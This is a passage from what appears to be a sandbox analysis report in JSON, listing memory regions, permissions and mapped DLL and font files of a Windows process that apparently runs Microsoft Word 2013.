"filename": null, "id": "region_202", "name": "private_0x00000000024d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38600704, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 38666240, "type": "region", "version": 1 }, "end_va": 38674431, "entry_point": 0, "filename": null, "id": "region_203", "name": "pagefile_0x00000000024e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 38666240, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 38731776, "type": "region", "version": 1 }, "end_va": 39780351, "entry_point": 0, "filename": null, "id": "region_204", "name": "private_0x00000000024f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38731776, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 520192, "start_va": 39780352, "type": "region", "version": 1 }, "end_va": 40300543, "entry_point": 39780352, "filename": "\\Windows\\Fonts\\segoeui.ttf", "id": "region_205", "name": "segoeui.ttf", "norm_filename": "c:\\windows\\fonts\\segoeui.ttf", "region_type": "memory_mapped_file", "start_va": 39780352, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 40501248, "type": "region", "version": 1 }, "end_va": 40763391, "entry_point": 0, "filename": null, "id": "region_206", "name": "private_0x00000000026a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 40501248, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4194304, "start_va": 40763392, "type": "region", "version": 1 }, "end_va": 44957695, "entry_point": 0, "filename": null, "id": "region_207", "name": "pagefile_0x00000000026e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 40763392, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 9633792, "start_va": 44957696, "type": "region", "version": 1 }, "end_va": 54591487, "entry_point": 44957696, "filename": "\\Windows\\Fonts\\StaticCache.dat", "id": "region_208", "name": "staticcache.dat", "norm_filename": "c:\\windows\\fonts\\staticcache.dat", "region_type": "memory_mapped_file", "start_va": 44957696, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 54591488, "type": "region", "version": 1 }, "end_va": 55640063, "entry_point": 0, "filename": null, "id": "region_209", "name": "private_0x0000000003410000", "norm_filename": null, "region_type": "private_memory", "start_va": 54591488, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 55771136, "type": "region", "version": 1 }, "end_va": 56033279, "entry_point": 0, "filename": null, "id": "region_210", "name": "private_0x0000000003530000", "norm_filename": null, "region_type": "private_memory", "start_va": 55771136, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 56426496, "type": "region", "version": 1 }, "end_va": 56492031, "entry_point": 0, "filename": null, "id": "region_211", "name": "private_0x00000000035d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 56426496, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 56492032, "type": "region", "version": 1 }, "end_va": 57540607, "entry_point": 0, "filename": null, "id": "region_212", "name": "private_0x00000000035e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 56492032, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 57933824, "type": "region", "version": 1 }, "end_va": 57999359, "entry_point": 0, "filename": null, "id": "region_213", "name": "private_0x0000000003740000", "norm_filename": null, "region_type": "private_memory", "start_va": 57933824, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 58261504, "type": "region", "version": 1 }, "end_va": 58327039, "entry_point": 0, "filename": null, "id": "region_214", "name": "private_0x0000000003790000", "norm_filename": null, "region_type": "private_memory", "start_va": 58261504, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 409600, "start_va": 58327040, "type": "region", "version": 1 }, "end_va": 58736639, "entry_point": 58327040, "filename": "\\Windows\\Fonts\\seguisb.ttf", "id": "region_215", "name": "seguisb.ttf", "norm_filename": "c:\\windows\\fonts\\seguisb.ttf", "region_type": "memory_mapped_file", "start_va": 58327040, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 59047936, "type": "region", "version": 1 }, "end_va": 60096511, "entry_point": 0, "filename": null, "id": "region_216", "name": "private_0x0000000003850000", "norm_filename": null, "region_type": "private_memory", "start_va": 59047936, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 60358656, "type": "region", "version": 1 }, "end_va": 60424191, "entry_point": 0, "filename": null, "id": "region_217", "name": "private_0x0000000003990000", "norm_filename": null, "region_type": "private_memory", "start_va": 60358656, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 60424192, "type": "region", "version": 1 }, "end_va": 68812799, "entry_point": 0, "filename": null, "id": "region_218", "name": "pagefile_0x00000000039a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 60424192, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 68878336, "type": "region", "version": 1 }, "end_va": 69926911, "entry_point": 0, "filename": null, "id": "region_219", "name": "private_0x00000000041b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 68878336, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 69926912, "type": "region", "version": 1 }, "end_va": 70713343, "entry_point": 69926912, "filename": "\\Windows\\System32\\en-US\\KernelBase.dll.mui", "id": "region_220", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 69926912, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 71106560, "type": "region", "version": 1 }, "end_va": 72155135, "entry_point": 0, "filename": null, "id": "region_221", "name": "private_0x00000000043d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 71106560, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 72613888, "type": "region", "version": 1 }, "end_va": 73662463, "entry_point": 0, "filename": null, "id": "region_222", "name": "private_0x0000000004540000", "norm_filename": null, "region_type": "private_memory", "start_va": 72613888, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 73990144, "type": "region", "version": 1 }, "end_va": 75038719, "entry_point": 0, "filename": null, "id": "region_223", "name": "private_0x0000000004690000", "norm_filename": null, "region_type": "private_memory", "start_va": 73990144, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 75038720, "type": "region", "version": 1 }, "end_va": 79233023, "entry_point": 0, "filename": null, "id": "region_224", "name": "pagefile_0x0000000004790000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 75038720, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 80478208, "type": "region", "version": 1 }, "end_va": 80740351, "entry_point": 0, "filename": null, "id": "region_225", "name": "private_0x0000000004cc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 80478208, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 82247680, "type": "region", "version": 1 }, "end_va": 82509823, "entry_point": 0, "filename": null, "id": "region_226", "name": "private_0x0000000004e70000", "norm_filename": null, "region_type": "private_memory", "start_va": 82247680, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 84541440, "type": "region", "version": 1 }, "end_va": 84803583, "entry_point": 0, "filename": null, "id": "region_227", "name": "private_0x00000000050a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 84541440, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 84803584, "type": "region", "version": 1 }, "end_va": 88997887, "entry_point": 0, "filename": null, "id": "region_228", "name": "private_0x00000000050e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 84803584, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2097152, "start_va": 88997888, "type": "region", "version": 1 }, "end_va": 91095039, "entry_point": 0, "filename": null, "id": "region_229", "name": "private_0x00000000054e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 88997888, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 91095040, "type": "region", "version": 1 }, "end_va": 95289343, "entry_point": 0, "filename": null, "id": "region_230", "name": "private_0x00000000056e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 91095040, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 95289344, "type": "region", "version": 1 }, "end_va": 103677951, "entry_point": 0, "filename": null, "id": "region_231", "name": "pagefile_0x0000000005ae0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 95289344, "timestamp": "00:00:14.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4198400, "start_va": 103677952, "type": "region", "version": 1 }, "end_va": 107876351, "entry_point": 0, "filename": null, "id": "region_232", "name": "private_0x00000000062e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 103677952, "timestamp": "00:00:14.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4198400, "start_va": 107937792, "type": "region", "version": 1 }, "end_va": 112136191, "entry_point": 0, "filename": null, "id": "region_233", "name": "private_0x00000000066f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 107937792, "timestamp": "00:00:14.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4198400, "start_va": 112197632, "type": "region", "version": 1 }, "end_va": 116396031, "entry_point": 0, "filename": null, "id": "region_234", "name": "private_0x0000000006b00000", "norm_filename": null, "region_type": "private_memory", "start_va": 112197632, "timestamp": "00:00:14.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2097152, "start_va": 116457472, "type": "region", "version": 1 }, "end_va": 118554623, "entry_point": 0, "filename": null, "id": "region_235", "name": "private_0x0000000006f10000", "norm_filename": null, "region_type": "private_memory", "start_va": 116457472, "timestamp": "00:00:14.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4980736, "start_va": 118554624, "type": "region", "version": 1 }, "end_va": 123535359, "entry_point": 0, "filename": null, "id": "region_236", "name": "private_0x0000000007110000", "norm_filename": null, "region_type": "private_memory", "start_va": 118554624, "timestamp": "00:00:14.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 123535360, "type": "region", "version": 1 }, "end_va": 127729663, "entry_point": 0, "filename": null, "id": "region_237", "name": "private_0x00000000075d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 123535360, "timestamp": "00:00:14.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 127729664, "type": "region", "version": 1 }, "end_va": 136118271, "entry_point": 0, "filename": null, "id": "region_238", "name": "private_0x00000000079d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 127729664, "timestamp": "00:00:14.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 912392192, "type": "region", "version": 1 }, "end_va": 912457727, "entry_point": 0, "filename": null, "id": "region_239", "name": "private_0x0000000036620000", "norm_filename": null, "region_type": "private_memory", "start_va": 912392192, "timestamp": "00:00:14.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1630208, "start_va": 1671495680, "type": "region", "version": 1 }, "end_va": 1673125887, "entry_point": 1671495680, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\RICHED20.DLL", "id": "region_240", "name": "riched20.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\riched20.dll", "region_type": "memory_mapped_file", "start_va": 1671495680, "timestamp": "00:00:14.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 741376, "start_va": 1673134080, "type": "region", "version": 1 }, "end_va": 1673875455, "entry_point": 1673134080, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\ADAL.DLL", "id": "region_241", "name": "adal.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\adal.dll", "region_type": "memory_mapped_file", "start_va": 1673134080, "timestamp": "00:00:14.837", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 499712, "start_va": 1673920512, "type": "region", "version": 1 }, "end_va": 1674420223, "entry_point": 1673920512, "filename": "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll", "id": "region_242", "name": "mscoreei.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 1673920512, "timestamp": "00:00:14.844", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1089536, "start_va": 1675296768, "type": "region", "version": 1 }, "end_va": 1676386303, "entry_point": 1675296768, "filename": "\\Windows\\System32\\DWrite.dll", "id": "region_243", "name": "dwrite.dll", "norm_filename": "c:\\windows\\system32\\dwrite.dll", "region_type": "memory_mapped_file", "start_va": 1675296768, "timestamp": "00:00:14.855", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1228800, "start_va": 1676410880, "type": "region", "version": 1 }, "end_va": 1677639679, "entry_point": 1676410880, "filename": "\\Windows\\System32\\d3d10warp.dll", "id": "region_244", "name": "d3d10warp.dll", "norm_filename": "c:\\windows\\system32\\d3d10warp.dll", "region_type": "memory_mapped_file", "start_va": 1676410880, "timestamp": "00:00:14.856", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 80654336, "start_va": 1677656064, "type": "region", "version": 1 }, "end_va": 1758310399, "entry_point": 1677656064, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\MSORES.DLL", "id": "region_245", "name": "msores.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\msores.dll", "region_type": "memory_mapped_file", "start_va": 1677656064, "timestamp": "00:00:14.858", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 26099712, "start_va": 1758330880, "type": "region", "version": 1 }, "end_va": 1784430591, "entry_point": 1758330880, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\MSO.DLL", "id": "region_246", "name": "mso.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\mso.dll", "region_type": "memory_mapped_file", "start_va": 1758330880, "timestamp": "00:00:14.889", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 21741568, "start_va": 1784479744, "type": "region", "version": 1 }, "end_va": 1806221311, "entry_point": 1784479744, "filename": "\\Program Files\\Microsoft Office\\Office15\\WWLIB.DLL", "id": "region_247", "name": "wwlib.dll", "norm_filename": "c:\\program files\\microsoft office\\office15\\wwlib.dll", "region_type": "memory_mapped_file", "start_va": 1784479744, "timestamp": "00:00:14.932", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1806630912, "type": "region", "version": 1 }, "end_va": 1807167487, "entry_point": 1806630912, "filename": "\\Windows\\System32\\d3d11.dll", "id": "region_248", "name": "d3d11.dll", "norm_filename": "c:\\windows\\system32\\d3d11.dll", "region_type": "memory_mapped_file", "start_va": 1806630912, "timestamp": "00:00:14.934", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1138688, "start_va": 1807220736, "type": "region", "version": 1 }, "end_va": 1808359423, "entry_point": 1807220736, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\MSPTLS.DLL", "id": "region_249", "name": "msptls.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\msptls.dll", "region_type": "memory_mapped_file", "start_va": 1807220736, "timestamp": "00:00:14.935", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3608576, "start_va": 1808400384, "type": "region", "version": 1 }, "end_va": 1812008959, "entry_point": 1808400384, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\1033\\MSOINTL.DLL", "id": "region_250", "name": "msointl.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\1033\\msointl.dll", "region_type": "memory_mapped_file", "start_va": 1808400384, "timestamp": "00:00:14.938", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 786432, "start_va": 1812070400, "type": "region", "version": 1 }, "end_va": 1812856831, "entry_point": 1812070400, "filename": "\\Program Files\\Microsoft Office\\Office15\\1033\\WWINTL.DLL", "id": "region_251", "name": "wwintl.dll", "norm_filename": "c:\\program files\\microsoft office\\office15\\1033\\wwintl.dll", "region_type": "memory_mapped_file", "start_va": 1812070400, "timestamp": "00:00:14.939", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 761856, "start_va": 1812856832, "type": "region", "version": 1 }, "end_va": 1813618687, "entry_point": 1812856832, "filename": "\\Windows\\System32\\d2d1.dll", "id": "region_252", "name": "d2d1.dll", "norm_filename": "c:\\windows\\system32\\d2d1.dll", "region_type": "memory_mapped_file", "start_va": 1812856832, "timestamp": "00:00:14.940", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 14319616, "start_va": 1813643264, "type": "region", "version": 1 }, "end_va": 1827962879, "entry_point": 1813643264, "filename": "\\Program Files\\Microsoft Office\\Office15\\OART.DLL", "id": "region_253", "name": "oart.dll", "norm_filename": "c:\\program files\\microsoft office\\office15\\oart.dll", "region_type": "memory_mapped_file", "start_va": 1813643264, "timestamp": "00:00:14.941", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1855455232, "type": "region", "version": 1 }, "end_va": 1855758335, "entry_point": 1855455232, "filename": "\\Windows\\System32\\mscoree.dll", "id": "region_254", "name": "mscoree.dll", "norm_filename": "c:\\windows\\system32\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 1855455232, "timestamp": "00:00:14.942", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 331776, "start_va": 1861025792, "type": "region", "version": 1 }, "end_va": 1861357567, "entry_point": 1861025792, "filename": "\\Windows\\System32\\winspool.drv", "id": "region_255", "name": "winspool.drv", "norm_filename": "c:\\windows\\system32\\winspool.drv", "region_type": "memory_mapped_file", "start_va": 1861025792, "timestamp": "00:00:14.953", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 1864499200, "type": "region", "version": 1 }, "end_va": 1864683519, "entry_point": 1864499200, "filename": "\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL", "id": "region_256", "name": "osppc.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll", "region_type": "memory_mapped_file", "start_va": 1864499200, "timestamp": "00:00:14.980", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 1865351168, "type": "region", "version": 1 }, "end_va": 1865437183, "entry_point": 1865351168, "filename": "\\Program Files\\Microsoft Office\\Office15\\MSOHEV.DLL", "id": "region_257", "name": "msohev.dll", "norm_filename": "c:\\program files\\microsoft office\\office15\\msohev.dll", "region_type": "memory_mapped_file", "start_va": 1865351168, "timestamp": "00:00:14.995", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1409024, "start_va": 1875050496, "type": "region", "version": 1 }, "end_va": 1876459519, "entry_point": 1875050496, "filename": "\\Windows\\System32\\msxml6.dll", "id": "region_258", "name": "msxml6.dll", "norm_filename": "c:\\windows\\system32\\msxml6.dll", "region_type": "memory_mapped_file", "start_va": 1875050496, "timestamp": "00:00:14.996", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 5242880, "start_va": 1887240192, "type": "region", "version": 1 }, "end_va": 1892483071, "entry_point": 1887240192, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\Cultures\\OFFICE.ODF", "id": "region_259", "name": "office.odf", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\cultures\\office.odf", "region_type": "memory_mapped_file", "start_va": 1887240192, "timestamp": "00:00:15.039", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2359296, "start_va": 1892483072, "type": "region", "version": 1 }, "end_va": 1894842367, "entry_point": 1892483072, "filename": "\\Windows\\System32\\msi.dll", "id": "region_260", "name": "msi.dll", "norm_filename": "c:\\windows\\system32\\msi.dll", "region_type": "memory_mapped_file", "start_va": 1892483072, "timestamp": "00:00:15.043", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 430080, "start_va": 1895038976, "type": "region", "version": 1 }, "end_va": 1895469055, "entry_point": 1895038976, "filename": "\\Windows\\System32\\msvcp100.dll", "id": "region_261", "name": "msvcp100.dll", "norm_filename": "c:\\windows\\system32\\msvcp100.dll", "region_type": "memory_mapped_file", "start_va": 1895038976, "timestamp": "00:00:15.105", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 782336, "start_va": 1895497728, "type": "region", "version": 1 }, "end_va": 1896280063, "entry_point": 1895497728, "filename": "\\Windows\\System32\\msvcr100.dll", "id": "region_262", "name": "msvcr100.dll", "norm_filename": "c:\\windows\\system32\\msvcr100.dll", "region_type": "memory_mapped_file", "start_va": 1895497728, "timestamp": "00:00:15.119", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1899888640, "type": "region", "version": 1 }, "end_va": 1900425215, "entry_point": 1899888640, "filename": "\\Windows\\System32\\dxgi.dll", "id": "region_263", "name": "dxgi.dll", "norm_filename": "c:\\windows\\system32\\dxgi.dll", "region_type": "memory_mapped_file", "start_va": 1899888640, "timestamp": "00:00:15.129", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 237568, "start_va": 1900478464, "type": "region", "version": 1 }, "end_va": 1900716031, "entry_point": 1900478464, "filename": "\\Windows\\System32\\d3d10_1core.dll", "id": "region_264", "name": "d3d10_1core.dll", "norm_filename": "c:\\windows\\system32\\d3d10_1core.dll", "region_type": "memory_mapped_file", "start_va": 1900478464, "timestamp": "00:00:15.130", "type": 